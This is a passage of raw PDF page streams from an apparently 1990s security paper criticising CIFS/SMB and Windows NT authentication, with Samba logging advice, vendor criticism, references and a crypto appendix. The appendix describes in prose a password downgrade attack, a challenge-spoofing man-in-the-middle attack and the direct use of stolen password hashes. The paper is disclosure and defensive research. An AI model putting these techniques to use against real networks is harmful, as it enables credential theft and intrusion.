(suggestions. Supplying an "allow" entry and cranking the debug level up to) Tj 1 0 0 1 54 228.9 Tm (at least 2 will cause all TCon attempts to be logged, along with a certain) Tj 1 0 0 1 54 218.4 Tm (quantity of other noise. A small saving grace here is that Samba by default) Tj 1 0 0 1 54 207.9 Tm (runs in *share* level, so an attack would take the form of repeated TCon) Tj 1 0 0 1 54 197.4 Tm (attempts and cause lots of logging. This is still not sufficient with user) Tj 1 0 0 1 54 186.9 Tm (level security. User logins are also logged at debug level 2 but only with) Tj 1 0 0 1 54 176.4 Tm (the client computername, and one would have to group together many log entries) Tj 1 0 0 1 54 165.9 Tm (to reconstruct an attack footprint. The best way to deal with Samba would be) Tj 1 0 0 1 54 155.4 Tm (some minimal changes to the server code, perhaps to getpeername\(\) on the) Tj 1 0 0 1 54 144.9 Tm (current network socket any time a login *or* TCon is attempted and concisely) Tj 1 0 0 1 54 134.4 Tm (log success or failure along with the client name *and* IP address. Nmbd) Tj 1 0 0 1 54 123.9 Tm (could be changed to log status queries at debug level 0 instead of 3, to help) Tj 1 0 0 1 54 113.4 Tm (warn about UDP name-gathering probes even if the "no default route" sleaze or) Tj 1 0 0 1 54 102.9 Tm (scopes are in use. Sending security-critical logging to the syslog instead of) Tj 1 0 0 1 54 92.4 Tm (Samba's default logfiles would bring it more in line with other daemons and) Tj 1 0 0 1 54 81.9 Tm (maybe cause administrators to pay more attention to it.) Tj ET Q endstream endobj 134 0 obj 5905 endobj 129 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R132 132 0 R >> >> /Contents [ 130 0 R 133 0 R ] >> endobj 136 0 obj << /Length 137 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 137 0 obj 48 endobj 138 0 obj << /Type /Font /Name /R138 /Subtype /Type1 /BaseFont /Courier >> endobj 139 0 obj << /Length 140 0 R >> stream BT /R138 10 Tf 1 0 0 1 54 708.9 Tm (Snide comments) Tj 1 0 0 1 54 698.4 Tm (==============) Tj 1 0 0 1 54 677.4 Tm (Although a primary goal has been to point out weakness in the CIFS protocol) Tj 1 0 0 1 54 666.9 Tm (and specific implementations, backhanded comments have so far [with some) Tj 1 0 0 1 54 656.4 Tm (difficulty] been kept to a minimum. Readers who are easily upset by a certain) Tj 1 0 0 1 54 645.9 Tm (amount of vendor-bashing or other no-holds-barred dissing are encouraged to) Tj 1 0 0 1 54 635.4 Tm (skip this section, where we bump up the nasty level. Why? Because it needs) Tj 1 0 0 1 54 624.9 Tm (to be stated, partially with the hope of getting certain people to WAKE UP.) Tj 1 0 0 1 54 614.4 Tm (Some of this is certainly conjecture, but guesses made here are reasonably) Tj 1 0 0 1 54 603.9 Tm (educated.) Tj 1 0 0 1 54 582.9 Tm (Experienced Unix people are likely to already understand many of these issues,) Tj 1 0 0 1 54 572.4 Tm (and know the "been there, done that, fixed the code" feeling. It is sadly) Tj 1 0 0 1 54 561.9 Tm (evident that many people running all-Microsoft shops are way behind the curve) Tj 1 0 0 1 54 551.4 Tm (where overall network security is concerned, and still struggling with a lot) Tj 1 0 0 1 54 540.9 Tm (of the basics. Some sites don't know or care, as long as they can get their) Tj 1 0 0 1 54 530.4 Tm (electronic ad agencies connected and sell lots of that web-slum real estate) Tj 1 0 0 1 54 519.9 Tm (with the spiffy pictures and no content. We hear of things like complete) Tj 1 0 0 1 54 509.4 Tm (trust placed in obscurity measures such as "inside" RAS dialups. Those who) Tj 1 0 0 1 54 498.9 Tm (are starting to play with firewalls often pull such classic stunts as) Tj 1 0 0 1 54 488.4 Tm (connecting one in parallel with a regular router and relying on default) Tj 1 0 0 1 54 477.9 Tm (routing entries on individual hosts to send traffic to the firewall first.) Tj 1 0 0 1 54 467.4 Tm (Blocking relevant IP traffic is often met with managerial resistance or) Tj 1 0 0 1 54 456.9 Tm (confusion. Standard IP-level attacks work against such sites because most of) Tj 1 0 0 1 54 446.4 Tm (them do not really understand TCP/IP, and do not have any useful network) Tj 1 0 0 1 54 435.9 Tm (monitoring gear available. Unix is just foreign and scary, particularly to) Tj 1 0 0 1 54 425.4 Tm (these so-called experts who are now popping out of the woodwork and mindlessly) Tj 1 0 0 1 54 414.9 Tm (repeating that laughable lie about NT's C2 rating. These same people will) Tj 1 0 0 1 54 404.4 Tm (tell you how no-brainer bugs like ".." and wide-open registry permissions) Tj 1 0 0 1 54 393.9 Tm (are new and hot, but fall right over when asked about crypto algorithms or) Tj 1 0 0 1 54 383.4 Tm (wire-level packet structure. Try mentioning how NetBIOS is just a load of) Tj 1 0 0 1 54 372.9 Tm (CACA to such an expert, and expect a blank look in return.) Tj 1 0 0 1 54 351.9 Tm (Unix-savvy folks nowadays are used to having source for their operating) Tj 1 0 0 1 54 341.4 Tm (systems, especially where there are security concerns, or at least are easily) Tj 1 0 0 1 54 330.9 Tm (able to implement replacements and enhancements to the weak vendor-supplied) Tj 1 0 0 1 54 320.4 Tm (stuff. Microsoft not only makes this unavailable and difficult, it relies) Tj 1 0 0 1 54 309.9 Tm (heavily on internal obscurity and deliberate lack of documentation as part of) Tj 1 0 0 1 54 299.4 Tm (security architecture. Since Microsoft refuses to help even when asked, the) Tj 1 0 0 1 54 288.9 Tm (Samba developers have had to go through many contortions and waste a lot of) Tj 1 0 0 1 54 278.4 Tm (valuable time reverse-engineering things just to support certain features. A) Tj 1 0 0 1 54 267.9 Tm (reader can *feel* the triumph in those occasional messages to the Samba list) Tj 1 0 0 1 54 257.4 Tm (when someone works out one of those "undocumented Microsoft" things and) Tj 1 0 0 1 54 246.9 Tm (submits a patch. Security is often an arms race, which Microsoft is simply) Tj 1 0 0 1 54 236.4 Tm (escalating and making worse for everyone by producing yet more flimsy) Tj 1 0 0 1 54 225.9 Tm (obscurity. If it is not there already, NT source code will eventually hit) Tj 1 0 0 1 54 215.4 Tm (underground circulation as ubiquitously as that of other "proprietary") Tj 1 0 0 1 54 204.9 Tm (operating systems. We should expect that numerous exploits of the obscurity) Tj 1 0 0 1 54 194.4 Tm (will have even the security-concerned sites falling like dominoes.) Tj 1 0 0 1 54 173.4 Tm (As we review some of its more blatant failings, the fundamental design of CIFS) Tj 1 0 0 1 54 162.9 Tm (authentication quickly becomes ridiculous. The draft even describes several) Tj 1 0 0 1 54 152.4 Tm (potentially serious security problems, but inexplicably makes no attempt to) Tj 1 0 0 1 54 141.9 Tm (FIX them. Part of the Internet-drafts process is to design and standardize) Tj 1 0 0 1 54 131.4 Tm (new protocols that move the industry forward, not to mire it in outdated toy) Tj 1 0 0 1 54 120.9 Tm (protocols that place it at risk! There is no documented way for server-end) Tj 1 0 0 1 54 110.4 Tm (enforcement of secure authentication methods, and no way to provide for *both*) Tj 1 0 0 1 54 99.9 Tm (user-level and share-level modes. At least two easy MITM attacks make the) Tj 1 0 0 1 54 89.4 Tm (challenge-response protocol fall, and it can also be dictionary attacked in) Tj 1 0 0 1 54 78.9 Tm (separate piecemeal DES blocks. Different users with different privileges can) Tj ET Q endstream endobj 140 0 obj 5543 endobj 135 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R138 138 0 R >> >> /Contents [ 136 0 R 139 0 R ] >> endobj 142 0 obj << /Length 143 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 143 0 obj 48 endobj 144 0 obj << /Type /Font /Name /R144 /Subtype /Type1 /BaseFont /Courier >> endobj 145 0 obj << /Length 146 0 R >> stream BT /R144 10 Tf 1 0 0 1 54 711.9 Tm (wind up sharing a single TCP connection, which violates one of the more) Tj 1 0 0 1 54 701.4 Tm (traditional [albeit still insecure] ways of holding users apart. CIFS seems) Tj 1 0 0 1 54 690.9 Tm (to have no provision for fully encrypted sessions, despite the the fact that) Tj 1 0 0 1 54 680.4 Tm (client and server already share at least one secret key and a few minor) Tj 1 0 0 1 54 669.9 Tm (enhancements to SMB could provide real session encryption. It is clear that) Tj 1 0 0 1 54 659.4 Tm (those behind CIFS are still mentally locked into the single user per client) Tj 1 0 0 1 54 648.9 Tm (model, since the issues raised by multiuser operating systems were evidently) Tj 1 0 0 1 54 638.4 Tm (never considered. It is almost criminal that other vendors are being forced) Tj 1 0 0 1 54 627.9 Tm (by market pressure to waste untold development dollars supporting this mess.) Tj 1 0 0 1 54 606.9 Tm (Perhaps Microsoft is nonetheless starting to acknowledge that *something*) Tj 1 0 0 1 54 596.4 Tm (needs to be done to replace the existing mockery of an authentication system.) Tj 1 0 0 1 54 585.9 Tm (Apparently there is support for Kerberos 5 authentication on the drawing board) Tj 1 0 0 1 54 575.4 Tm (for NT, if not in alpha by now. As far as I know Microsoft contributed) Tj 1 0 0 1 54 564.9 Tm (nothing to the Krb5 development effort themselves, so why Krb5? Ostensibly to) Tj 1 0 0 1 54 554.4 Tm (support DCE, but more realistically because Microsoft can just swipe the MIT) Tj 1 0 0 1 54 543.9 Tm (code now that it has been well-tested and officially released. It remains to) Tj 1 0 0 1 54 533.4 Tm (be seen whether this will be a full implementation, with perhaps an NT-based) Tj 1 0 0 1 54 522.9 Tm (KDC server?? I can't wait to see how badly *that* gets mangled, especially) Tj 1 0 0 1 54 512.4 Tm (when handling backward compatibility. Naturally some of the first things to) Tj 1 0 0 1 54 501.9 Tm (rip into will be random number generation and client storage of tickets. Will) Tj 1 0 0 1 54 491.4 Tm (we finally see some server-end enforcement of authentication types? Will) Tj 1 0 0 1 54 480.9 Tm (clients implement preauthenticated TGT requests, or be able to perform mutual) Tj 1 0 0 1 54 470.4 Tm (authentication to exchange keys for encrypted sessions? Not likely, since) Tj 1 0 0 1 54 459.9 Tm (CIFS seems to imply that Microsoft is banking on the eventual deployment of) Tj 1 0 0 1 54 449.4 Tm (IPSEC instead. Here again, they take the easy way out instead of actively) Tj 1 0 0 1 54 438.9 Tm (helping implement secure protocols. It's just as well, really, since if CIFS) Tj 1 0 0 1 54 428.4 Tm (is any example they would probably screw it up at the standards level and set) Tj 1 0 0 1 54 417.9 Tm (everyone else back.) Tj 1 0 0 1 54 396.9 Tm (Default settings on even the latest NT server is still laughable, as are most) Tj 1 0 0 1 54 386.4 Tm (of its responses under attack. Okay, so they turned off the NT4.0 GUEST) Tj 1 0 0 1 54 375.9 Tm (account by default after significant public humiliation, but why stop there?) Tj 1 0 0 1 54 365.4 Tm (Creating a new fileshare *still* lays it wide open to the "Everyone" group,) Tj 1 0 0 1 54 354.9 Tm (unless several obscure menu layers are waded through to reset the ACLs. This) Tj 1 0 0 1 54 344.4 Tm (still does not prevent the "Everyone" group from *deleting* arbitrary files) Tj 1 0 0 1 54 333.9 Tm (unless yet another service pack has been applied. There is little enforcement) Tj 1 0 0 1 54 323.4 Tm (for good passwords. All security auditing is still disabled until the) Tj 1 0 0 1 54 312.9 Tm (administrator turns it on and makes an effort to prevent it from filling up) Tj 1 0 0 1 54 302.4 Tm (and becoming useless -- and the logging still has little value in the WAN) Tj 1 0 0 1 54 291.9 Tm (environment. Already there is talk of potentially egregious weaknesses in) Tj 1 0 0 1 54 281.4 Tm (various interactions like domain password changing and interdomain trust) Tj 1 0 0 1 54 270.9 Tm (relationships. Microsoft apparently made the ".." mistake in ALL their OS) Tj 1 0 0 1 54 260.4 Tm (offerings, from WFWG up to the vaunted NT 3.51. It took a lynch mob to) Tj 1 0 0 1 54 249.9 Tm (convince them to fix it, and it's *still* popping up here and there in other) Tj 1 0 0 1 54 239.4 Tm (add-on products. And we won't even talk about some of those add-ons, which) Tj 1 0 0 1 54 228.9 Tm (already have been shown to fall over when lightly tickled, or allow full) Tj 1 0 0 1 54 218.4 Tm (read/write file access to completely unauthenticated users.) Tj 1 0 0 1 54 197.4 Tm (We can and should honestly ask, what *are* they thinking out there in Redmond?) Tj 1 0 0 1 54 186.9 Tm (Besides the usual complaints about unstable bloatware, we are starting to see) Tj 1 0 0 1 54 176.4 Tm (a steady stream of stupid, naive ten year old security problems, from weak) Tj 1 0 0 1 54 165.9 Tm (so-called encryption of .PWL files on up. The answers usually consist of) Tj 1 0 0 1 54 155.4 Tm (denial and refusing to fix the flaws, and only under tremendous pressure) Tj 1 0 0 1 54 144.9 Tm (does anything get done. Is this the same vendor we are supposed to trust) Tj 1 0 0 1 54 134.4 Tm (to produce an operating system and network suite as "secure" as is claimed) Tj 1 0 0 1 54 123.9 Tm (for NT, especially when it is held forth as a *replacement* for Unix? Are) Tj 1 0 0 1 54 113.4 Tm (we to lay large amounts of tithe at the feet of the Golden Gates for a) Tj 1 0 0 1 54 102.9 Tm (complex behemoth that we are repeatedly reassured [read: lied to] is robust) Tj 1 0 0 1 54 92.4 Tm (under fire, but continues to fall for the same old stupid reasons? The) Tj 1 0 0 1 54 81.9 Tm (Internet security community is now pushing two decades of finding those little) Tj ET Q endstream endobj 146 0 obj 5790 endobj 141 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R144 144 0 R >> >> /Contents [ 142 0 R 145 0 R ] >> endobj 148 0 obj << /Length 149 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 149 0 obj 48 endobj 150 0 obj << /Type /Font /Name /R150 /Subtype /Type1 /BaseFont /Courier >> endobj 151 0 obj << /Length 152 0 R >> stream BT /R150 10 Tf 1 0 0 1 54 711.9 Tm (headache-producing bonus gifts that come with major vendor-supplied OSes. One) Tj 1 0 0 1 54 701.4 Tm (would surely think that a relative newcomer in that arena would take the time) Tj 1 0 0 1 54 690.9 Tm (to learn from all those well-documented mistakes and make some effort to avoid) Tj 1 0 0 1 54 680.4 Tm (them, but no, here we go 'round again. This stuff is *not* technically ready) Tj 1 0 0 1 54 669.9 Tm (for prime time in today's internet, but is being brutally pressed into service) Tj 1 0 0 1 54 659.4 Tm (for the sake of the bottom line. Common sense screams "run away", and we can) Tj 1 0 0 1 54 648.9 Tm (easily anticipate another decade of nasty holes that will undoubtedly turn up) Tj 1 0 0 1 54 638.4 Tm (and be promptly swept under the rug by hordes of marketroids whose jobs are) Tj 1 0 0 1 54 627.9 Tm (*not* particularly dependent on secure, robust computing environments.) Tj 1 0 0 1 54 606.9 Tm (No thank you, I'd rather not go *there* today.) Tj 1 0 0 1 54 585.9 Tm (It will be interesting to see if the trade press picks up on any of this.) Tj 1 0 0 1 54 575.4 Tm (If past experience is any indicator they will simply color the whole issue) Tj 1 0 0 1 54 564.9 Tm (yellow, denounce Samba as a cracker tool while defending poor widdle abused) Tj 1 0 0 1 54 554.4 Tm (Microsoft, and as usual not help anyone address the real problems.) Tj 1 0 0 1 54 533.4 Tm (Conclusions) Tj 1 0 0 1 54 522.9 Tm (===========) Tj 1 0 0 1 54 501.9 Tm (By now the reader may be thinking twice before replacing all those Unix) Tj 1 0 0 1 54 491.4 Tm (servers with NT, and considering the significant risks in yielding to all that) Tj 1 0 0 1 54 480.9 Tm (marketing rah-rah. In general we now see, in what is hoped to be a clearer) Tj 1 0 0 1 54 470.4 Tm (way than previously, both how and why to check networks for these additional) Tj 1 0 0 1 54 459.9 Tm (vulnerabilities. Unix may have its own problems, but overall it is still) Tj 1 0 0 1 54 449.4 Tm (easier to secure and verify for correctness, and is largely free with all) Tj 1 0 0 1 54 438.9 Tm (sources included. There are many good people out there proactively finding) Tj 1 0 0 1 54 428.4 Tm (and fixing Unix problems on a daily basis. And as detailed in this document,) Tj 1 0 0 1 54 417.9 Tm (Unix still has plenty of fight in it to help kick the NT monster in the ass.) Tj 1 0 0 1 54 396.9 Tm (The question remaining is, has this document helped at all, or is it just) Tj 1 0 0 1 54 386.4 Tm (another rework of old information? It began to take shape under the distinct) Tj 1 0 0 1 54 375.9 Tm (feeling that the research involved *must* have been long since done already,) Tj 1 0 0 1 54 365.4 Tm (given today's ubiquity of SMB environments, and that it would appear about as) Tj 1 0 0 1 54 354.9 Tm (timely as discussion of Morris worm holes. But as more sources were scanned,) Tj 1 0 0 1 54 344.4 Tm (many of the relevant points just didn't seem to be there or were buried as) Tj 1 0 0 1 54 333.9 Tm (vague hints or hearsay in unrelated discussions. Again, the intent is to) Tj 1 0 0 1 54 323.4 Tm (simply present this information in a cohesive and useful way, warn against) Tj 1 0 0 1 54 312.9 Tm (some clear and present risks, and plant seeds to foster future work.) Tj 1 0 0 1 54 291.9 Tm (References and acknowledgements) Tj 1 0 0 1 54 281.4 Tm (===============================) Tj 1 0 0 1 54 260.4 Tm (This is an independent research effort of Avian Research, and is presented) Tj 1 0 0 1 54 249.9 Tm (to the Internet community in the hope that it will be educational and) Tj 1 0 0 1 54 239.4 Tm (useful. Nearly all the information utilized was obtained via groping) Tj 1 0 0 1 54 228.9 Tm (around on the internet, and is referenced largely in that context.) Tj 1 0 0 1 54 207.9 Tm (Early stages of the project were partially funded by Secure Networks, Inc. of) Tj 1 0 0 1 54 197.4 Tm (Calgary, CA. They have recently released a greatly enhanced NetBIOS security) Tj 1 0 0 1 54 186.9 Tm (scanner that embodies many of the concepts described here. Also Samba-based,) Tj 1 0 0 1 54 176.4 Tm (it is now available via FTP at ftp.secnet.com:/pub/tools/nat10. ) Tj 1 0 0 1 54 155.4 Tm (Possibly the most instructive document is the CIFS spec, which can be found at) Tj 1 0 0 1 54 144.9 Tm (www.internic.net:/internet-drafts/draft-heizer-cifs-v1-spec-00.txt. The spec) Tj 1 0 0 1 54 134.4 Tm (for NetBIOS over TCP is in RFC1001 and RFC1002, available at any RFC) Tj 1 0 0 1 54 123.9 Tm (repository. Another important source is of course the Samba suite, from) Tj 1 0 0 1 54 113.4 Tm (nimbus.anu.edu.au:/pub/tridge/samba and numerous mirror sites. The "old-) Tj 1 0 0 1 54 102.9 Tm (versions" subdirectory thereof should contain version 1.9.15p8 of the code.) Tj 1 0 0 1 54 81.9 Tm (Microsoft's "knowledge base" contains lots of fairly good, albeit rather) Tj ET Q endstream endobj 152 0 obj 4882 endobj 147 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R150 150 0 R >> >> /Contents [ 148 0 R 151 0 R ] >> endobj 154 0 obj << /Length 155 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 155 0 obj 48 endobj 156 0 obj << /Type /Font /Name /R156 /Subtype /Type1 /BaseFont /Courier >> endobj 157 0 obj << /Length 158 0 R >> stream BT /R156 10 Tf 1 0 0 1 54 711.9 Tm (sanitized, information via FTP or the web. The NT articles are summarized) Tj 1 0 0 1 54 701.4 Tm (in ftp.microsoft.com:/bussys/winnt/kb/index.txt, which is possibly the best) Tj 1 0 0 1 54 690.9 Tm (starting point. The Microsoft resource kits are another reference source that) Tj 1 0 0 1 54 680.4 Tm (could possibly have answered more questions, but were unavailable at the time) Tj 1 0 0 1 54 669.9 Tm (and therefore *not* consulted.) Tj 1 0 0 1 54 648.9 Tm (Many security practitioners are collecting information about problems in) Tj 1 0 0 1 54 638.4 Tm (Microsoft products. The "hack Microsoft" page at www.c2.org:/hackmsoft/) Tj 1 0 0 1 54 627.9 Tm (is a good example, as is the information that Somarsoft makes available at) Tj 1 0 0 1 54 617.4 Tm (www.somarsoft.com:/security.htm and related items. Details about problems) Tj 1 0 0 1 54 606.9 Tm (in the IIS web server and related things are up for grabs at www.omna.com.) Tj 1 0 0 1 54 585.9 Tm (As NT specifically loomed larger as a problem area during data collection,) Tj 1 0 0 1 54 575.4 Tm (many NT-specific references came to light. It has been VERY difficult to) Tj 1 0 0 1 54 564.9 Tm (avoid diving down the thousands of potential ratholes involved with closer) Tj 1 0 0 1 54 554.4 Tm (investigation of NT. An email exchange with Tom Sheldon, initially concerning) Tj 1 0 0 1 54 543.9 Tm (a reference to Netcat he wanted to add to his book, got us talking. The) Tj 1 0 0 1 54 533.4 Tm (book is now out: "Windows NT Security Handbook" [680 pages, 0-07-882240-8,) Tj 1 0 0 1 54 522.9 Tm ($34.99US]. Helpful tidbits of information came from this, along with many) Tj 1 0 0 1 54 512.4 Tm (more from Tom's very informational site at www.ntresearch.com. Several) Tj 1 0 0 1 54 501.9 Tm (papers, articles, and checklists are available there. Another site that is) Tj 1 0 0 1 54 491.4 Tm (also beginning to make several NT *tools* [notably NTFSDOS] available is) Tj 1 0 0 1 54 480.9 Tm (www.ntinternals.com, run by Mark Russinovich and Bryce Cogswell.) Tj 1 0 0 1 54 459.9 Tm (The archive of the NT-security mailing list is overwhelmingly HUGE by now, and) Tj 1 0 0 1 54 449.4 Tm (lives at ftp.iss.net:/pub/lists/ntsecurity-digest.archive/. Nevertheless, the) Tj 1 0 0 1 54 438.9 Tm (bulk of it was pulled down and at least searched for relevant items if not) Tj 1 0 0 1 54 428.4 Tm (read outright. ISS also maintains some vulnerability databases and security) Tj 1 0 0 1 54 417.9 Tm (checklists. The mailing list appears to be useful, and frequently points to) Tj 1 0 0 1 54 407.4 Tm (other sources on NT security. Here are some of them. They do not all appear) Tj 1 0 0 1 54 396.9 Tm (to have titles or authors; some are just random web pages that may have more) Tj 1 0 0 1 54 386.4 Tm (than one maintainer.) Tj 1 0 0 1 54 365.4 Tm ( An Overview of Windows NT Security, by Jim Frost, May 4, 1995) Tj 1 0 0 1 54 354.9 Tm ( world.std.com:/~jimf/nt-security.html) Tj 1 0 0 1 54 333.9 Tm ( A comprehensive collection of pointers to other NT security resources) Tj 1 0 0 1 54 323.4 Tm ( is taking shape at www.it.kth.se/~rom/ntsec.html.) Tj 1 0 0 1 54 302.4 Tm ( Bill Stout posted a paper comparing NT vs. Unix network security, last seen) Tj 1 0 0 1 54 291.9 Tm ( at www.hidata.com:/guest/whitepapers/NTsec.htm. It may have moved since.) Tj 1 0 0 1 54 270.9 Tm (Bruce Schneier should of course be mentioned, whose "Applied Cryptography") Tj 1 0 0 1 54 260.4 Tm (presents a very clear picture of using crypto properly. Laurent Joncheray) Tj 1 0 0 1 54 249.9 Tm (presented his interesting paper on the "desync" TCP attack at the 1995 Usenix) Tj 1 0 0 1 54 239.4 Tm (Security conference. Random items have been plucked out of various mailing) Tj 1 0 0 1 54 228.9 Tm (lists like NTSEC and Firewalls along the way, specific references to which) Tj 1 0 0 1 54 218.4 Tm (were never saved. Those wonderful wackos who maintain www.L0pht.com have) Tj 1 0 0 1 54 207.9 Tm (been extremely supportive of the ongoing research, and are also starting to) Tj 1 0 0 1 54 197.4 Tm (make some interesting tools and examples available. Dominique Brezinski at) Tj 1 0 0 1 54 186.9 Tm (cybersafe.com was helpful in some private mail, and John Hood sent several) Tj 1 0 0 1 54 176.4 Tm (last-minute edits.) Tj 1 0 0 1 54 155.4 Tm (Thanks go out in general to those folks in the Internet security community) Tj 1 0 0 1 54 144.9 Tm (with that no-bullshit approach, who do not hold back with getting problems) Tj 1 0 0 1 54 134.4 Tm (out where everyone can help examine and solve them on a timely basis.) Tj 1 0 0 1 54 113.4 Tm (Appendix A: Crypto) Tj 1 0 0 1 54 102.9 Tm (==================) Tj 1 0 0 1 54 81.9 Tm (There are two algorithms used to cryptographically secure the authentication) Tj ET Q endstream endobj 158 0 obj 4801 endobj 153 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R156 156 0 R >> >> /Contents [ 154 0 R 157 0 R ] >> endobj 160 0 obj << /Length 161 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 161 0 obj 48 endobj 162 0 obj << /Type /Font /Name /R162 /Subtype /Type1 /BaseFont /Courier >> endobj 163 0 obj << /Length 164 0 R >> stream BT /R162 10 Tf 1 0 0 1 54 711.9 Tm (data between a user and a server. The earlier LANMAN-compatible algorithm) Tj 1 0 0 1 54 701.4 Tm (uppercases the password, truncates or pads to 14 characters as needed, and) Tj 1 0 0 1 54 690.9 Tm (derives therefrom a pair of odd-parity DES keys to ECB-encrypt a fixed 8-byte) Tj 1 0 0 1 54 680.4 Tm (quantity described in CIFS as "available from Microsoft upon request" but) Tj 1 0 0 1 54 669.9 Tm (already well-known to be the decryption of 0xAAD3B435B51404EE with a key of) Tj 1 0 0 1 54 659.4 Tm (all zeros. The second method is currently supported by NT and Samba, which) Tj 1 0 0 1 54 648.9 Tm (preserves the case of the password up to 128 bytes, converts it to unicode,) Tj 1 0 0 1 54 638.4 Tm (and runs the result through MD4. Each algorithm outputs 16 bytes of) Tj 1 0 0 1 54 627.9 Tm (cryptographic hash that securely represents the user's password. These 16) Tj 1 0 0 1 54 617.4 Tm (bytes are called "OWF passwords" from the associated one-way function, and are) Tj 1 0 0 1 54 606.9 Tm (stored in registries and Samba's alternate "smbpasswd" file. Smbencrypt.c) Tj 1 0 0 1 54 596.4 Tm (in conjunction with the "libdes" routines handle most of this.) Tj 1 0 0 1 54 575.4 Tm (For challenge response, five more nulls are appended to either hash type and) Tj 1 0 0 1 54 564.9 Tm (the 21 total bytes used as a key triple to DES encrypt the 8-byte challenge) Tj 1 0 0 1 54 554.4 Tm (into three separate output blocks. The final 24-byte output of this process) Tj 1 0 0 1 54 543.9 Tm (is sent in the SMB in place of the plaintext password. The password length) Tj 1 0 0 1 54 533.4 Tm (normally sits at parameter word smb_vwv7 as Samba builds the block, and the) Tj 1 0 0 1 54 522.9 Tm (buffer area farther along contains the response bytes. Under NT LM dialect) Tj 1 0 0 1 54 512.4 Tm (there are two password fields -- one for the all-uppercase LANMAN-compatible) Tj 1 0 0 1 54 501.9 Tm (password or hash thereof and one for the case-sensitive NT-style equivalent.) Tj 1 0 0 1 54 491.4 Tm (The lengths sit at smb_vwv7 and smb_vwv8 respectively, and the corresponding) Tj 1 0 0 1 54 480.9 Tm (data buffers are consecutive. NT clients by default fill both buffers with) Tj 1 0 0 1 54 470.4 Tm (the two types of encrypted 24-byte responses. If told to use plaintext) Tj 1 0 0 1 54 459.9 Tm (passwords, the NT client only sends a LANMAN password in smb_vwv7 but in) Tj 1 0 0 1 54 449.4 Tm (*mixed* case.) Tj 1 0 0 1 54 428.4 Tm (This is open to more than one easy man-in-the-middle attack. One is even) Tj 1 0 0 1 54 417.9 Tm (documented in CIFS as the "downgrade attack", wherein a fake server response) Tj 1 0 0 1 54 407.4 Tm (tells a client to use observable cleartext passwords. Since the fake response) Tj 1 0 0 1 54 396.9 Tm (packet only needs one changed payload bit and different checksums, this attack) Tj 1 0 0 1 54 386.4 Tm (is undetectable since a later real response is simply discarded by the TCP) Tj 1 0 0 1 54 375.9 Tm (transport. A more interesting attack involves taking the cryptkey from one) Tj 1 0 0 1 54 365.4 Tm (session and network-spoofing it into a victim's later one; the victim's) Tj 1 0 0 1 54 354.9 Tm (resulting 24-byte response is used to authenticate the first session instead.) Tj 1 0 0 1 54 344.4 Tm (Here, CIFS makes the cryptographically naive error of letting the client user) Tj 1 0 0 1 54 333.9 Tm ("sign" the arbitrary data in the cryptkey instead of a hash that includes it.) Tj 1 0 0 1 54 312.9 Tm (The application user interfaces in general encourage the historically bad) Tj 1 0 0 1 54 302.4 Tm (practice for all users to choose the same password across many different) Tj 1 0 0 1 54 291.9 Tm (machines, even across different NT domains. This is held forth as a single-) Tj 1 0 0 1 54 281.4 Tm (sign-on model, but standard elements of a real SSO system such as time-limited) Tj 1 0 0 1 54 270.9 Tm (session credentials never enter the picture at all. The implementation also) Tj 1 0 0 1 54 260.4 Tm (is in many ways too restrictive for most real-world environments. How does) Tj 1 0 0 1 54 249.9 Tm (one go about the sounder practice of having separate accounts for separate) Tj 1 0 0 1 54 239.4 Tm (machines or groups thereof? Some utilities will ask for another password) Tj 1 0 0 1 54 228.9 Tm (and try again if the cached login password isn't correct for a different) Tj 1 0 0 1 54 218.4 Tm (server, but this doesn't work everywhere. Example: The NT "net" utility) Tj 1 0 0 1 54 207.9 Tm (accepts a "/USER:othername" switch when doing a "net use", but not when doing) Tj 1 0 0 1 54 197.4 Tm (a "net view". Remote registry editing and related tools first try to use the) Tj 1 0 0 1 54 186.9 Tm (credentials from the console login, and if that doesn't work either ask for an) Tj 1 0 0 1 54 176.4 Tm (alternate password or simply fail. Sometimes a way to specify a completely) Tj 1 0 0 1 54 165.9 Tm (alternate login is necessary, but NT's designers seems to have ignored this) Tj 1 0 0 1 54 155.4 Tm (and not even provided a global "net logon" facility like under WFWG. Often) Tj 1 0 0 1 54 144.9 Tm (one is forced to create new local accounts and passwords, or use some other) Tj 1 0 0 1 54 134.4 Tm (band-aid workaround, just to authenticate some underdesigned application to a) Tj 1 0 0 1 54 123.9 Tm (remote system.) Tj 1 0 0 1 54 102.9 Tm (The OWF hashes do not directly reveal a user's plaintext password but if) Tj 1 0 0 1 54 92.4 Tm (somehow obtained, can be directly used for authentication as well as input to) Tj 1 0 0 1 54 81.9 Tm (an offline dictionary attack. Directly storing them therefore reduces the) Tj ET Q endstream endobj 164 0 obj 5633 endobj 159 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R162 162 0 R >> >> /Contents [ 160 0 R 163 0 R ] >> endobj 166 0 obj << /Length 167 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 167 0 obj 48 endobj 168 0 obj << /Type /Font /Name /R168 /Subtype /Type1 /BaseFont /Courier >> endobj 169 0 obj << /Length 170 0 R >> stream BT /R168 10 Tf 1 0 0 1 54 711.9 Tm (security to about the level of burying plaintext passwords inside scripts and) Tj 1 0 0 1 54 701.4 Tm (thinking "well, the script is hidden, so the password is safe." Microsoft) Tj 1 0 0 1 54 690.9 Tm (tries to crock around this recognized decades-old problem by re-encrypting) Tj 1 0 0 1 54 680.4 Tm (the hashes under some *other* key that is often stored in some obscure but) Tj 1 0 0 1 54 669.9 Tm (nonetheless findable place. Authentication information is also cached in) Tj 1 0 0 